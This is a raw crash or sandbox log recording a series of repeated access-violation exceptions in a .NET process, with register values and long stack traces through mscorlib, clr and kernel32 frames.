DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca

exception.instruction_r: 39 09 e8 2d 63 0a 6d 89 45 bc 8b 55 bc b9 b0 af
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xd2a804
registers.esp: 86498516
registers.edi: 86502980
registers.eax: 0
registers.ebp: 86502988
registers.edx: 44387132
registers.ebx: 43004700
registers.esi: 44386720
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xd25546
0xd25377
0xd2524d
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xd251be
0xd25037
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xb0fcd8
0xb0f7a8
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xb013e4
0xb00db4
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca

exception.instruction_r: 39 09 e8 60 62 0a 6d 89 45 c8 83 7d c8 00 74 1f
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xd2a8d1
registers.esp: 86502916
registers.edi: 86502980
registers.eax: 0
registers.ebp: 86502988
registers.edx: 44549408
registers.ebx: 43004700
registers.esi: 44386720
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xd25546
0xd25377
0xd2524d
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xd251be
0xd25037
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xb0fcd8
0xb0f7a8
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xb013e4
0xb00db4
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca

exception.instruction_r: 39 09 e8 ed 61 0a 6d 89 45 bc 8b 55 bc b9 b0 af
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xd2a944
registers.esp: 86498516
registers.edi: 86502980
registers.eax: 0
registers.ebp: 86502988
registers.edx: 44549408
registers.ebx: 43004700
registers.esi: 44386720
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xd25569
0xd25377
0xd2524d
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xd251be
0xd25037
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xb0fcd8
0xb0f7a8
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xb013e4
0xb00db4
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca

exception.instruction_r: 39 09 e8 20 61 0a 6d 89 45 c8 83 7d c8 00 74 1f
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xd2aa11
registers.esp: 86502916
registers.edi: 86502980
registers.eax: 0
registers.ebp: 86502988
registers.edx: 43379776
registers.ebx: 43004700
registers.esi: 44386720
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xd25569
0xd25377
0xd2524d
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xd251be
0xd25037
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xb0fcd8
0xb0f7a8
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xb013e4
0xb00db4
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca

exception.instruction_r: 39 09 e8 ad 60 0a 6d 89 45 bc 8b 55 bc b9 b0 af
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xd2aa84
registers.esp: 86498516
registers.edi: 86502980
registers.eax: 0
registers.ebp: 86502988
registers.edx: 43379776
registers.ebx: 43004700
registers.esi: 44386720
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xd2ab3d
0xd2558c
0xd25377
0xd2524d
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xd251be
0xd25037
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xb0fcd8
0xb0f7a8
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xb013e4
0xb00db4
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf

exception.instruction_r: 39 09 e8 20 61 0a 6d 89 45 c8 83 7d c8 00 74 1f
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xd2aa11
registers.esp: 86502800
registers.edi: 86502864
registers.eax: 0
registers.ebp: 86502872
registers.edx: 43379776
registers.ebx: 43004700
registers.esi: 44386720
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xd2ab3d
0xd2558c
0xd25377
0xd2524d
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xd251be
0xd25037
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xb0fcd8
0xb0f7a8
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xb013e4
0xb00db4
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf

exception.instruction_r: 39 09 e8 ad 60 0a 6d 89 45 bc 8b 55 bc b9 b0 af
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xd2aa84
registers.esp: 86498404
registers.edi: 86502864
registers.eax: 0
registers.ebp: 86502872
registers.edx: 43379776
registers.ebx: 43004700
registers.esi: 44386720
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xd2ab4b
0xd2558c
0xd25377
0xd2524d
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xd251be
0xd25037
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xb0fcd8
0xb0f7a8
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
mscorlib+0x34bece @ 0x6deabece
mscorlib+0x34be97 @ 0x6deabe97
0xb013e4
0xb00db4
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x34b13b @ 0x6deab13b
mscorlib+0x30d3a5 @ 0x6de6d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6ec1264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6ec12e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x6ed0f1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x6ec77d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x6ec77dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x6ec77e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6ec0c3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x6ed0f164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x6ecef54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6ed1a0cf

exception.instruction_r: 39 09 e8 a0 63 0a 6d 89 45 c8 83 7d c8 00 74 1f
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xd2a791
registers.esp: 86502800
registers.edi: 86502864
registers.eax: 0
registers.ebp: 86502872
registers.edx: 43331156
registers.ebx: 43004700
registers.esi: 44386720
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0xd2ab4b
0xd2558c
0xd25377
0xd2524d
mscorlib+0x34b4fd @ 0x6deab4fd
mscorlib+0x34b466 @ 0x6deab466
mscorlib+0x34b429 @ 0x6deab429
mscorlib+0x3022a6 @ 0x6de622a6
mscorlib+0x34b2d2 @ 0x6deab2d2
mscorlib+0x34b1f7 @ 0x6deab1f7
mscorlib+0x382cf2 @ 0x6dee2cf2
mscorlib+0x34c5a2 @ 0x6deac5a2
mscorlib+0xd4c6a0 @ 0x6e8ac6a0
mscorlib+0xa2a294 @ 0x6e58a294
